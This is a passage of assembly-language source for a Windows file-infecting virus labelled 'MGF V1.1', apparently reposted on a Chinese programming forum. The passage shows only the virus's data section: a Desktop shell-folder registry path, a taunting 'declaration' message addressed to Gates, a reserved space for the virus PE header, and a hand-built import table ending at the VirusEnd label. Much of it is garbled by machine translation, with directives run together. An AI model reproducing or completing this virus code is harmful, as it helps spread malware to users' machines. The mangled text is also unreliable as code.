POPADRET_EDITLNKFILE ENDPSZREGKEYDESKTOP DB 'Software / Microsoft / Windows / CurrentVersion / Explorer / Shell Folders', 0SzdesktopValue DB 'Desktop', 0

SzmessageTit DB 'Mo Guofeng's Declaration', 0SzMessageText DB 'This makers come to the dissemination technology. I have no destruction, you don't have to worry! ', 13, 10db' 我 我 比. Gates: Your fools, despise my vulnerability report, you should play their PP! ', 0

Szver DB 'Name: MGF V1.1', 0Address db '(c) nn.cn (p) 2003-10-08', 0EMAIL DB 'WOHOO2002 @ Hotmail.com', 0

FileHead DB 120H DUP (255); virus PE header, use of viruses, need to manually fill, only reserve space

ImportDirItem:; import table, it is not 2000 / XP / 2003 perform load rejection, to be dd offset FirstThunk0-400000hdd 0dd 0dd offset szKernel32-400000hdd offset FirstThunk1-400000hdd 5 dup (0) FirstThunk0: dd offset szFunctionName-400000hdd 0

Firstthunk1: DD Offset SZFUNCTIONNAME-400000HDD 0

SZFunctionName: DW 75HDB 'EXITPROCESS', 0, 0, 0

Virusend: End VirusStart

转载请注明原文地址:https://www.9cbs.com/read-7572.html

New Post(0)